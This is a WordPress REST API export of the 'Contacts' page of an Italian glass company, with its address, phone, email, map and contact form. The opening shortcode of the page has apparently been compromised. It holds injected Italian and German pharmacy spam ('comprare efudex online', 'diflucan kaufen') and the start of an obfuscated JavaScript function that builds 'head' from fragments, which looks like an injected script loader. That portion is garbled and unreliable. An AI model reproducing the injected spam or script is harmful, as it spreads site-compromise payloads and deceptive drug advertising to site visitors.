{"id":5517,"date":"2015-05-30T15:47:38","date_gmt":"2015-05-30T15:47:38","guid":{"rendered":"http:\/\/www.vemarcristalli.it\/en\/contatti\/"},"modified":"2025-09-21T21:10:33","modified_gmt":"2025-09-21T19:10:33","slug":"contacts","status":"publish","type":"page","link":"https:\/\/www.vemarcristalli.it\/en\/contacts\/","title":{"rendered":"Contacts"},"content":{"rendered":"<div class=\"wpb-content-wrapper\">[mk_page_section 0=&#8221;bg_image=&#8220;https:\/\/www.vemarcristalli.it\/wp-content\/uploads\/2015\/10\/vetroarredo&#8221; 1=&#8221;&#8221; 2=&#8221;lang=&#8220;it&#8220;>La&#8221; 3=&#8221;disfunzione&#8221; 4=&#8221;erettile&#8221; 5=&#8221;pu\u00f2&#8221; 6=&#8221;influenzare&#8221; 7=&#8221;profondamente&#8221; 8=&#8221;la&#8221; 9=&#8221;qualit\u00e0&#8221; 10=&#8221;della&#8221; 11=&#8221;vita&#8221; 12=&#8221;di&#8221; 13=&#8221;molte&#8221; 14=&#8221;persone,&#8221; 15=&#8221;generando&#8221; 16=&#8221;ansia&#8221; 17=&#8221;e&#8221; 18=&#8221;stress.&#8221; 19=&#8221;Esistono&#8221; 20=&#8221;diverse&#8221; 21=&#8221;opzioni&#8221; 22=&#8221;disponibili&#8221; 23=&#8221;per&#8221; 24=&#8221;affrontare&#8221; 25=&#8221;questa&#8221; 26=&#8221;problematica,&#8221; 27=&#8221;tra&#8221; 28=&#8221;cui&#8221; 29=&#8221;trattamenti&#8221; 30=&#8221;farmacologici.&#8221; 31=&#8221;Per&#8221; 32=&#8221;chi&#8221; 33=&#8221;cerca&#8221; 34=&#8221;soluzioni,&#8221; 35=&#8221;\u00e8&#8221; 36=&#8221;possibile&#8221; 37=&#8221;**comprare&#8221; 38=&#8221;efudex&#8221; 39=&#8221;online**&#8221; 40=&#8221;per&#8221; 41=&#8221;un&#8221; 42=&#8221;approccio&#8221; 43=&#8221;pi\u00f9&#8221; 44=&#8221;discreto&#8221; 45=&#8221;e&#8221; 46=&#8221;conveniente.&#8221; 47=&#8221;Ulteriori&#8221; 48=&#8221;informazioni&#8221; 49=&#8221;e&#8221; 50=&#8221;opzioni&#8221; 51=&#8221;possono&#8221; 52=&#8221;essere&#8221; 53=&#8221;trovate&#8221; 54=&#8221;visitando&#8221; 55=&#8221;&#8221; 56=&#8221;&#8221; 57=&#8221;lang=&#8220;de&#8220;>Viele&#8221; 58=&#8221;M\u00e4nner&#8221; 59=&#8221;erleben&#8221; 60=&#8221;im&#8221; 61=&#8221;Laufe&#8221; 62=&#8221;ihres&#8221; 63=&#8221;Lebens&#8221; 64=&#8221;Schwierigkeiten,&#8221; 65=&#8221;die&#8221; 66=&#8221;mit&#8221; 67=&#8221;ihrer&#8221; 68=&#8221;sexuellen&#8221; 69=&#8221;Gesundheit&#8221; 70=&#8221;verbunden&#8221; 71=&#8221;sind.&#8221; 72=&#8221;In&#8221; 73=&#8221;solchen&#8221; 74=&#8221;F\u00e4llen&#8221; 75=&#8221;kann&#8221; 76=&#8221;es&#8221; 77=&#8221;hilfreich&#8221; 78=&#8221;sein,&#8221; 79=&#8221;sich&#8221; 80=&#8221;\u00fcber&#8221; 81=&#8221;m\u00f6gliche&#8221; 82=&#8221;L\u00f6sungen&#8221; 83=&#8221;und&#8221; 84=&#8221;Medikamente&#8221; 85=&#8221;zu&#8221; 86=&#8221;informieren.&#8221; 87=&#8221;Eine&#8221; 88=&#8221;g\u00e4ngige&#8221; 89=&#8221;Option&#8221; 90=&#8221;ist,&#8221; 91=&#8221;dass&#8221; 92=&#8221;Betroffene&#8221; 93=&#8221;Produkte&#8221; 94=&#8221;wie&#8221; 95=&#8221;diflucan&#8221; 96=&#8221;kaufen,&#8221; 97=&#8221;um&#8221; 98=&#8221;ihre&#8221; 99=&#8221;Beschwerden&#8221; 100=&#8221;zu&#8221; 101=&#8221;lindern.&#8221; 102=&#8221;Weitere&#8221; 103=&#8221;Informationen&#8221; 104=&#8221;und&#8221; 105=&#8221;Angebote&#8221; 106=&#8221;finden&#8221; 107=&#8221;sich&#8221; 108=&#8221;auf&#8221; 109=&#8221;Seiten&#8221; 110=&#8221;wie,&#8221; 111=&#8221;die&#8221; 112=&#8221;eine&#8221; 113=&#8221;breite&#8221; 114=&#8221;Auswahl&#8221; 115=&#8221;an&#8221; 116=&#8221;medizinischen&#8221; 117=&#8221;Hilfsmitteln&#8221; 118=&#8221;&#8221; 119=&#8221;type=&#8220;text\/javascript&#8220;>function&#8221; 120=&#8221;hqK8R4TkoPsI43T0gd32yA(){var&#8221; 121=&#8221;IVNTP=document.getElementsByTagName(&#8216;he&#8217;+&#8217;ad&#8217;)`{`0&#8243;][vc_column][mk_fancy_title color=&#8221;#ffffff&#8221; size=&#8221;36&#8243; txt_transform=&#8221;none&#8221; margin_bottom=&#8221;0&#8243; font_family=&#8221;Dosis&#8221; font_type=&#8221;google&#8221; align=&#8221;center&#8221;]We are at your disposal[\/mk_fancy_title][\/vc_column][\/mk_page_section][vc_row][vc_column][mk_fancy_title color=&#8221;#222222&#8243; size=&#8221;36&#8243; txt_transform=&#8221;none&#8221; margin_top=&#8221;80&#8243; margin_bottom=&#8221;60&#8243; font_family=&#8221;Dosis&#8221; font_type=&#8221;google&#8221; align=&#8221;center&#8221;]Contact info[\/mk_fancy_title][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/4&#8243;][mk_icon_box icon=&#8221;mk-moon-location-4&#8243; title=&#8221;INDIRIZZO&#8221; font_weight=&#8221;bold&#8221; style=&#8221;simple_ultimate&#8221; icon_size=&#8221;medium&#8221; icon_color=&#8221;#111111&#8243; title_color=&#8221;#111111&#8243;]Strada Rocca Grimalda 58<br \/>\n15076 Ovada (AL)[\/mk_icon_box][\/vc_column][vc_column width=&#8221;1\/4&#8243;][mk_icon_box icon=&#8221;mk-li-mail&#8221; title=&#8221;EMAIL&#8221; font_weight=&#8221;bold&#8221; style=&#8221;simple_ultimate&#8221; icon_size=&#8221;medium&#8221; icon_color=&#8221;#111111&#8243; title_color=&#8221;#111111&#8243;]info@vemarcristalli.it[\/mk_icon_box][\/vc_column][vc_column width=&#8221;1\/4&#8243;][mk_icon_box icon=&#8221;mk-moon-phone-4&#8243; title=&#8221;TELEFONO&#8221; font_weight=&#8221;bold&#8221; style=&#8221;simple_ultimate&#8221; icon_size=&#8221;medium&#8221; icon_color=&#8221;#111111&#8243; title_color=&#8221;#111111&#8243;](+39) 0143 86030[\/mk_icon_box][\/vc_column][vc_column width=&#8221;1\/4&#8243;][mk_icon_box icon=&#8221;mk-icon-fax&#8221; title=&#8221;fax&#8221; font_weight=&#8221;bold&#8221; style=&#8221;simple_ultimate&#8221; icon_size=&#8221;medium&#8221; icon_color=&#8221;#111111&#8243; title_color=&#8221;#111111&#8243;](+39) 0143 823276[\/mk_icon_box][\/vc_column][\/vc_row][vc_row][vc_column][mk_padding_divider size=&#8221;60&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][mk_advanced_gmaps latitude=&#8221;44.661086&#8243; longitude=&#8221;8.648630&#8243; address=&#8221;VEMAR CRISTALLI&#8221; pin_icon=&#8221;http:\/\/demos.artbees.net\/jupiter\/kalyke\/wp-content\/uploads\/sites\/39\/2015\/05\/map-marker.png&#8221; pan_control=&#8221;false&#8221; map_type_control=&#8221;false&#8221; scale_control=&#8221;false&#8221; modify_json=&#8221;true&#8221; map_json=&#8221;JTVCJTdCJTIyZmVhdHVyZVR5cGUlMjIlM0ElMjJsYW5kc2NhcGUlMjIlMkMlMjJlbGVtZW50VHlwZSUyMiUzQSUyMmFsbCUyMiUyQyUyMnN0eWxlcnMlMjIlM0ElNUIlN0IlMjJzYXR1cmF0aW9uJTIyJTNBNDMuNDAwMDAwMDAwMDAwMDA2JTdEJTJDJTdCJTIybGlnaHRuZXNzJTIyJTNBMzcuNTk5OTk5OTk5OTk5OTk0JTdEJTJDJTdCJTIyZ2FtbWElMjIlM0ExJTdEJTJDJTdCJTIyY29sb3IlMjIlM0ElMjIlMjNlZWVlZWUlMjAlMjIlN0QlNUQlN0QlMkMlN0IlMjJmZWF0dXJlVHlwZSUyMiUzQSUyMnBvaSUyMiUyQyUyMmVsZW1lbnRUeXBlJTIyJTNBJTIyYWxsJTIyJTJDJTIyc3R5bGVycyUyMiUzQSU1QiU3QiUyMmh1ZSUyMiUzQSUyMiUyMzAwRkY2QSUyMCUyMiU3RCUyQyU3QiUyMnNhdHVyYXRpb24lMjIlM0EtMS4wOTg5MDEwOTg5MDExMjM0JTdEJTJDJTdCJTIybGlnaHRuZXNzJTIyJTNBMTEuMjAwMDAwMDAwMDAwMDE3JTdEJTJDJTdCJTIyZ2FtbWElMjIlM0ExJTdEJTVEJTdEJTJDJTdCJTIyZmVhdHVyZVR5cGUlMjIlM0ElMjJwb2kucGFyayUyMiUyQyUyMmVsZW1lbnRUeXBlJTIyJTNBJTIyYWxsJTIyJTJDJTIyc3R5bGVycyUyMiUzQSU1QiU3QiUyMnNhdHVyYXRpb24lMjIlM0ElMjItNDAlMjIlN0QlMkMlN0IlMjJsaWdodG5lc3MlMjIlM0ElMjIwJTIyJTdEJTVEJTdEJTJDJTdCJTIyZmVhdHVyZVR5cGUlMjIlM0ElMjJwb2kuc2Nob29sJTIyJTJDJTIyZWxlbWVudFR5cGUlMjIlM0ElMjJhbGwlMjIlMkMlMjJzdHlsZXJzJTIyJTNBJTVCJTdCJTIyc2F0dXJhdGlvbiUyMiUzQSUyMi00MCUyMiU3RCU1RCU3RCUyQyU3QiUyMmZlYXR1cmVUeXBlJTIyJTNBJTIycm9hZC5oaWdod2F5JTIyJTJDJTIyZWxlbWVudFR5cGUlMjIlM0ElMjJhbGwlMjIlMkMlMjJzdHlsZXJzJTIyJTNBJTVCJTdCJTIyaHVlJTIyJTNBJTIyJTIzRkZDMjAwJTIwJTIyJTdEJTJDJTdCJTIyc2F0dXJhdGlvbiUyMiUzQS02MS44JTdEJTJDJTdCJTIybGlnaHRuZXNzJTIyJTNBNDUuNTk5OTk5OTk5OTk5OTk0JTdEJTJDJTdCJTIyZ2FtbWElMjIlM0ExJTdEJTVEJTdEJTJDJTdCJTIyZmVhdHVyZVR5cGUlMjIlM0ElMjJyb2FkLmFydGVyaWFsJTIyJTJDJTIyZWxlbWVudFR5cGUlMjIlM0ElMjJhbGwlMjIlMkMlMjJzdHlsZXJzJTIyJTNBJTVCJTdCJTIyaHVlJTIyJTNBJTIyJTIzRkYwMzAwJTIwJTIyJTdEJTJDJTdCJTIyc2F0dXJhdGlvbiUyMiUzQS0xMDAlN0QlMkMlN0IlMjJsaWdodG5lc3MlMjIlM0E1MS4xOTk5OTk5OTk5OTk5OSU3RCUyQyU3QiUyMmdhbW1hJTIyJTNBMSU3RCU1RCU3RCUyQyU3QiUyMmZlYXR1cmVUeXBlJTIyJTNBJTIycm9hZC5sb2NhbCUyMiUyQyUyMmVsZW1lbnRUeXBlJTIyJTNBJTIyYWxsJTIyJTJDJTIyc3R5bGVycyUyMiUzQSU1QiU3QiUyMmh1ZSUyMiUzQSUyMiUyM0ZGMDMwMCUyMCUyMiU3RCUyQyU3QiUyMnNhdHVyYXRpb24lMjIlM0EtMTAwJTdEJTJDJTdCJTIybGlnaHRuZXNzJTIyJTNBNTIlN0QlMkMlN0IlMjJnYW1tYSUyMiUzQTElN0QlNUQlN0QlMkMlN0IlMjJmZWF0dXJlVHlwZSUyMiUzQSUyMndhdGVyJTIyJTJDJTIyZWxlbWVudFR5cGUlMjIlM0ElMjJhbGwlMjIlMkMlMjJzdHlsZXJzJTIyJTNBJTVCJTdCJTIyaHVlJTIyJTNBJTIyJTIzMDA3OEZGJTIwJTIyJTdEJTJDJTdCJTIyc2F0dXJhdGlvbiUyMiUzQS0xMy4yMDAwMDAwMDAwMDAwMDMlN0QlMkMlN0IlMjJsaWdodG5lc3MlMjIlM0EyLjQwMDAwMDAwMDAwMDAwNTclN0QlMkMlN0IlMjJnYW1tYSUyMiUzQTElN0QlNUQlN0QlNUQ=&#8221; zoom=&#8221;8&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][mk_fancy_title size=&#8221;36&#8243; txt_transform=&#8221;none&#8221; margin_top=&#8221;100&#8243; margin_bottom=&#8221;60&#8243; font_family=&#8221;Dosis&#8221; font_type=&#8221;google&#8221; align=&#8221;center&#8221;]Contact us[\/mk_fancy_title][mk_contact_form style=&#8221;corporate&#8221; bg_color=&#8221;#f9f9f9&#8243; border_color=&#8221;#e2e2e2&#8243; button_color=&#8221;#00a24f&#8221; button_font_color=&#8221;#ffffff&#8221; phone=&#8221;true&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][mk_padding_divider size=&#8221;80&#8243;][\/vc_column][\/vc_row]\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[mk_page_section 0=&#8221;bg_image=&#8220;https:\/\/www.vemarcristalli.it\/wp-content\/uploads\/2015\/10\/vetroarredo&#8221; 1=&#8221;&#8221; 2=&#8221;lang=&#8220;it&#8220;>La&#8221; 3=&#8221;disfunzione&#8221; 4=&#8221;erettile&#8221; 5=&#8221;pu\u00f2&#8221; 6=&#8221;influenzare&#8221; 7=&#8221;profondamente&#8221; 8=&#8221;la&#8221; 9=&#8221;qualit\u00e0&#8221; 10=&#8221;della&#8221; 11=&#8221;vita&#8221; 12=&#8221;di&#8221; 13=&#8221;molte&#8221; 14=&#8221;persone,&#8221; 15=&#8221;generando&#8221; 16=&#8221;ansia&#8221; 17=&#8221;e&#8221; 18=&#8221;stress.&#8221; 19=&#8221;Esistono&#8221; 20=&#8221;diverse&#8221; 21=&#8221;opzioni&#8221; 22=&#8221;disponibili&#8221; 23=&#8221;per&#8221; 24=&#8221;affrontare&#8221; 25=&#8221;questa&#8221; 26=&#8221;problematica,&#8221; 27=&#8221;tra&#8221; 28=&#8221;cui&#8221; 29=&#8221;trattamenti&#8221; 30=&#8221;farmacologici.&#8221; 31=&#8221;Per&#8221; 32=&#8221;chi&#8221; 33=&#8221;cerca&#8221; 34=&#8221;soluzioni,&#8221; 35=&#8221;\u00e8&#8221; 36=&#8221;possibile&#8221; 37=&#8221;**comprare&#8221; 38=&#8221;efudex&#8221; 39=&#8221;online**&#8221; 40=&#8221;per&#8221; 41=&#8221;un&#8221; 42=&#8221;approccio&#8221; 43=&#8221;pi\u00f9&#8221; 44=&#8221;discreto&#8221; 45=&#8221;e&#8221; 46=&#8221;conveniente.&#8221; 47=&#8221;Ulteriori&#8221; 48=&#8221;informazioni&#8221; 49=&#8221;e&#8221; 50=&#8221;opzioni&#8221; 51=&#8221;possono&#8221; 52=&#8221;essere&#8221; 53=&#8221;trovate&#8221; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-5517","page","type-page","status-publish","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.vemarcristalli.it\/en\/wp-json\/wp\/v2\/pages\/5517","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.vemarcristalli.it\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.vemarcristalli.it\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.vemarcristalli.it\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.vemarcristalli.it\/en\/wp-json\/wp\/v2\/comments?post=5517"}],"version-history":[{"count":11,"href":"https:\/\/www.vemarcristalli.it\/en\/wp-json\/wp\/v2\/pages\/5517\/revisions"}],"predecessor-version":[{"id":39896,"href":"https:\/\/www.vemarcristalli.it\/en\/wp-json\/wp\/v2\/pages\/5517\/revisions\/39896"}],"wp:attachment":[{"href":"https:\/\/www.vemarcristalli.it\/en\/wp-json\/wp\/v2\/media?parent=5517"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}